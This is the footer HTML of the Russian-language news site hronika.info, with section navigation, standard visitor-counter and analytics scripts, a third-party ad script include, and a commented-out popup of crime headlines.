					<li><a href="/tehnologii/" >Технологии</a></li>
					<li><a href="/avto/" >Авто</a></li>
					<li><a href="/obwestvo/" >Общество</a></li>
					<li><a href="/otdyh/" >Отдых</a></li>
					<li><a href="/neverojatnoe/" >Невероятное</a></li>
					<li><a href="/nedvizhimost/" >Недвижимость</a></li>	
					<li><a href="/videonovosti/" >Видеоновости</a></li>
                    <li><a href="/fotoreportazhi/" >Фоторепортажи</a></li>						
				</ul>					
				<ul class="clr reset">
					<li><a href="/rossija/" >Россия</a></li>
					<li><a href="/ukraina/" >Украина</a></li>
					<li><a href="/mir/" >Мир</a></li>
					<li><a href="/kultura/" >Культура</a></li>					
					<li><a href="/sport/" >Спорт</a></li>
					<li><a href="/medicina/" >Медицина</a></li>					
					<li><a href="/greenpeace/" >Гринпис</a></li>
				    <li><a href="/kriminal/" >Криминал</a></li>
					<li><a href="/igry/" >Игры</a></li>
					<li><a href="/videoigry/" >Видеоигры</a></li>					
				</ul>
			</nav>
            <a href="#"><img src="/templates/hronika/images/banners/footrekl.png" alt="Реклама" class="footrekl" /></a>
            <div class="clr5"></div>
            <div class="copyright_f"><p>Новостное интернет издание Хроника мировых событий - всегда только горячие и интересные новости со всей планеты. Все самые свежие события, происшествия, достижения и открытия мира освещаются на нашем сайте специально для вас. Копирование и использование информации с сайта Хроника инфо разрешается при условии прямой, открытой для поисковых систем гиперссылки на наш сайт. <span>hronika.info &copy; 2012-2018</span></p></div>
            <div class="counts">
            <nav class="footbut2">
            <ul class="clr5 reset">
              <li><a href="http://hronika.info/o-nas.html">О нас</a></li>
              <li><a href="http://hronika.info/sitemap.xml">Карта</a></li>
              <li><a href="http://hronika.info/vakansii.html">Вакансии</a></li>
              <li><a href="http://hronika.info/konakt.html">Контакты</a></li>
            </ul>   
                
            </nav>
            <!--noindex-->
              <div class="count"><!--noindex-->
<!--LiveInternet counter--><script type="text/javascript">
document.write("<a href='//www.liveinternet.ru/click' "+
"target=_blank><img src='//counter.yadro.ru/hit?t17.12;r"+
escape(document.referrer)+((typeof(screen)=="undefined")?"":
";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
";h"+escape(document.title.substring(0,150))+";"+Math.random()+
"' alt='' title='LiveInternet: показано число просмотров за 24"+
" часа, посетителей за 24 часа и за сегодня' "+
"border='0' width='88' height='31'><\/a>")
</script><!--/LiveInternet-->
<!--/noindex--></div>
              <div class="count"><!--noindex-->
<!-- I.UA counter --><a href="http://www.i.ua/" target="_blank" onclick="this.href='http://i.ua/r.php?165947';" title="Rated by I.UA">
<script type="text/javascript"><!--
iS='http'+(window.location.protocol=='https:'?'s':'')+
'://r.i.ua/s?u165947&p164&n'+Math.random();
iD=document;if(!iD.cookie)iD.cookie="b=b; path=/";if(iD.cookie)iS+='&c1';
iS+='&d'+(screen.colorDepth?screen.colorDepth:screen.pixelDepth)
+"&w"+screen.width+'&h'+screen.height;
iT=iR=iD.referrer.replace(iP=/^[a-z]*:\/\//,'');iH=window.location.href.replace(iP,'');
((iI=iT.indexOf('/'))!=-1)?(iT=iT.substring(0,iI)):(iI=iT.length);
if(iT!=iH.substring(0,iI))iS+='&f'+escape(iR);
iS+='&r'+escape(iH);
iD.write('<img src="'+iS+'" border="0" width="88" height="31" />');
//--></script></a><!-- End of I.UA counter -->
<!--/noindex--></div>
              <div class="count"></div>
              <div class="count"></div>
            <!--/noindex--></div>
      </footer>
      <a href="#top" id="goTop" class="go-top"><img src="/templates/hronika/images/up.png" alt="наверх" title="Подняться наверх" /></a>
      
<!-- popup     
      <div class="news-bot-show">
        <div id="dim7">
          <div class="msgbox7">
            <div class="msgboxttl7">
              <b>Материалы в разделе&nbsp;






КРИМИНАЛ













</b>
              <a class="close7">X</a>
            </div>






<div class="vsplivayushee-okno">
    <span class="spandate">24.02-15:11</span>
	<strong title="На Одесчине два полицейских пострадали в ДТП"><a href="http://hronika.info/kriminal/401466-na-odeschine-dva-policeyskih-postradali-v-dtp.html">На Одесчине два полицейских пострадали в ДТП</a></strong>			
</div><div class="vsplivayushee-okno">
    <span class="spandate">24.02-14:37</span>
	<strong title="На Харьковщине шестилетний мальчик провалился под лед и утонул"><a href="http://hronika.info/kriminal/401457-na-harkovschine-shestiletniy-malchik-provalilsya-pod-led-i-utonul.html">На Харьковщине шестилетний мальчик провалился под</a></strong>			
</div><div class="vsplivayushee-okno">
    <span class="spandate">24.02-13:52</span>
	<strong title="В Одессе в ДТП погибли два человека"><a href="http://hronika.info/kriminal/401444-v-odesse-v-dtp-pogibli-dva-cheloveka.html">В Одессе в ДТП погибли два человека</a></strong>			
</div><div class="vsplivayushee-okno">
    <span class="spandate">24.02-13:04</span>
	<strong title="В Киеве обнаружили тело пропавшего рыбака"><a href="http://hronika.info/kriminal/401431-v-kieve-obnaruzhili-telo-propavshego-rybaka.html">В Киеве обнаружили тело пропавшего рыбака</a></strong>			
</div><div class="vsplivayushee-okno">
    <span class="spandate">24.02-12:32</span>
	<strong title="Под Киевом произошла перестрелка на автозаправке"><a href="http://hronika.info/kriminal/401421-pod-kievom-proizoshla-perestrelka-na-avtozapravke.html">Под Киевом произошла перестрелка на автозаправке</a></strong>			
</div><div class="vsplivayushee-okno">
    <span class="spandate">24.02-11:56</span>
	<strong title="Под Киевом мужчина обустроил в доме нарколабораторию"><a href="http://hronika.info/kriminal/401410-pod-kievom-muzhchina-obustroil-v-dome-narkolaboratoriyu.html">Под Киевом мужчина обустроил в доме</a></strong>			
</div><div class="vsplivayushee-okno">
    <span class="spandate">24.02-11:22</span>
	<strong title="В центре Киева из Porshe украли сумку с деньгами"><a href="http://hronika.info/kriminal/401397-v-centre-kieva-iz-porshe-ukrali-sumku-s-dengami.html">В центре Киева из Porshe украли сумку с деньгами</a></strong>			
</div>


















            <hr />»
            <a href="/">Перейти на главную</a>
          </div>
        </div>
      </div>
-->
      
    <div id="fb-root"></div>
      <script type="text/javascript">	
$(document).ready(function(){$("#newstab2, #listalka_tab, #rightbl_tab, #ax_popular_obs, #ax_popular_comp").easyTabs({defaultContent:1})});$(document).ready(function(){$("#slider3").tinycarousel({pager:true,interval:true})});$(document).ready(function(){$("#dim7").css("height",$(document).height());$(".alert7").click(function(){$("#dim7").fadeIn();return false});$(".close7").click(function(){$(".news-bot-show").remove();return false})});$(window).bind("resize",function(){$("#dim7").css("height",$(window).height())});
$(document).ready(function(){$("div.short_2").addClass("alt");$("div.short_2_clr:even").addClass("alt")});
    </script>
<div id="fb-root"></div>

	<script type="text/javascript" src="/templates/hronika/js/libs.js"></script>
	<script type="text/javascript" src="/templates/hronika/js/orating_pack.js"></script>
        <!--[if IE]>
	<script src="http://html5shiv.googlecode.com/svn/trunk/html5.js"></script>
	<![endif]-->
	<!--[if IE 8]><link href="/templates/hronika/css/ie8.css"  rel="stylesheet" media="all" /><![endif]-->
<script>
(function(i,s,o,g,r,a,m){i["GoogleAnalyticsObject"]=r;i[r]=i[r]||function(){(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date;a=s.createElement(o),m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)})(window,document,"script","//www.google-analytics.com/analytics.js","ga");ga("create","UA-48298212-1","hronika.info");ga("send","pageview");
</script>

<script>window.RESOURCE_O1B2L3 = 'leokross.com';</script>
<script src="//leokross.com/ED9.js" ></script>
 

</body>

</html>
<!-- DataLife Engine Copyright SoftNews Media Group (http://dle-news.ru) -->
